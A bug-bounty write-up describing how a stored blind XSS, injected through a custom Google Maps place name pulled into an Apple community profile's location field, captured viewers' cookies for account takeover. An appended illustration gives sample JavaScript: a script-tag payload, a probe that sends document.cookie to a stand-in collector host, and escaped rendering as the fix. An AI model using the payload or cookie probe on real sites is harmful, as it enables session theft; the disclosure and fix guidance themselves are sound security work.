How I Found a Bug at Apple That Leads to Account Takeover of Any User Who Views My Profile

3 min read · Dec 29, 2022


Hi team, I am Abdelkader Mouaz, and my pseudo is Hamzadzworm. Today I will share with you a bug that leads to account takeover of any user just by viewing my profile.

I was hunting on Apple for a few days. I tried doing subdomain enumeration using multiple tools to get all possible subdomains, and I was able to get about 20K live subdomains. It was a big list, but I had a lot of time, so I kept testing them one by one.

I found an interesting one: a community subdomain that you can log in to with your iCloud account. So I was thinking that if I got an account takeover there, I would be able to take over iCloud accounts.

I kept searching for a few days until I got an interesting endpoint. It was a location one, where I am able to put a location on my profile, but I couldn't do that manually.

Location addresses were added automatically by entering an address, and it was picking these automatic locations from Apple Maps. Here is an example of it:

It was redirecting me to Google Maps with an input of Test/Test.

That was an interesting thing, so I went to add a new map that is not listed in Google Maps, then shared it using the endpoint I found:

After I was able to add the map, I put a blind XSS payload in the Google place name, then sent it, and it was accepted. It wasn't executed in Google, for sure,

but after I linked it, because Apple Maps takes the map from Google Maps, I was able to make a final payload and add it to my profile location, and

it was at (Lieu), which means Location, as you can see in the screenshot below.

And yay, it's executed!

Then I added a blind XSS payload to the map, opened a new account, and tried to view my profile that contained the blind XSS. It fired, and I got the cookies of that account at my XSS Hunter account, which allowed me to take over the account.
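As an added illustration (this is not the author's code and not Apple's), here is how a place name that arrives from a third-party maps provider can become a stored XSS on a profile page, and what the escaped rendering looks like. The place record, the "Lieu" markup, the collector URL and every function name are hypothetical and constructed for the example.

```javascript
// Added example, not code from the write-up. Shows the bug class:
// a field the site never thought of as user input (a place name
// pulled from a maps provider) is rendered as raw HTML on a profile,
// so anyone viewing the profile runs the attacker's script.

// Constructed place record as the profile backend might receive it
// from the maps provider. The "name" is whatever the attacker typed
// when creating the custom map; the provider stored it verbatim.
const placeFromMapsApi = {
  name: '"><script src="https://collector.example/probe.js"></script>',
  address: 'Test/Test', // hypothetical address, as in the write-up
};

// Vulnerable rendering: provider data concatenated straight into HTML.
function renderLocationVulnerable(place) {
  return `<div class="location">Lieu: ${place.name}</div>`;
}

// HTML-escape the characters that can break out of text or
// attribute context. Sufficient for text nodes and quoted attributes;
// a URL or JavaScript sink would need its own encoder.
function escapeHtml(value) {
  const map = {
    '&': '&amp;',
    '<': '&lt;',
    '>': '&gt;',
    '"': '&quot;',
    "'": '&#39;',
  };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened rendering: same template, output-encoded at the sink.
function renderLocationSafe(place) {
  return `<div class="location">Lieu: ${escapeHtml(place.name)}</div>`;
}

// What a blind-XSS probe typically does once it runs in the victim's
// browser: report the origin and any cookies JavaScript can read back
// to the hunter's collector. Cookies flagged HttpOnly are not visible
// to document.cookie, which is why that flag matters on session cookies.
function buildBlindXssProbe(collectorUrl) {
  return [
    'new Image().src = ' + JSON.stringify(collectorUrl) +
      ' + "?o=" + encodeURIComponent(location.href)' +
      ' + "&c=" + encodeURIComponent(document.cookie);',
  ].join('\n');
}

// Quick check a tester can run over rendered markup: did an injected
// tag survive into the page?
function containsInjectedTag(html) {
  return /<script\b|<img\b[^>]*\bonerror=/i.test(html);
}

// Demonstration when run directly.
console.log(renderLocationVulnerable(placeFromMapsApi));
console.log(renderLocationSafe(placeFromMapsApi));
console.log(buildBlindXssProbe('https://collector.example/log'));
```

Note that the fix belongs at the output sink, not at the maps provider: the profile page cannot rely on upstream data being clean, and any value it did not generate itself (including place names, addresses and map titles) has to be encoded for the context it lands in. Marking the session cookie HttpOnly would not remove the XSS, but it would stop the simple cookie exfiltration that turned it into an account takeover.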

I hope you enjoyed the write-up. Leave a comment for me if you liked it -.- :)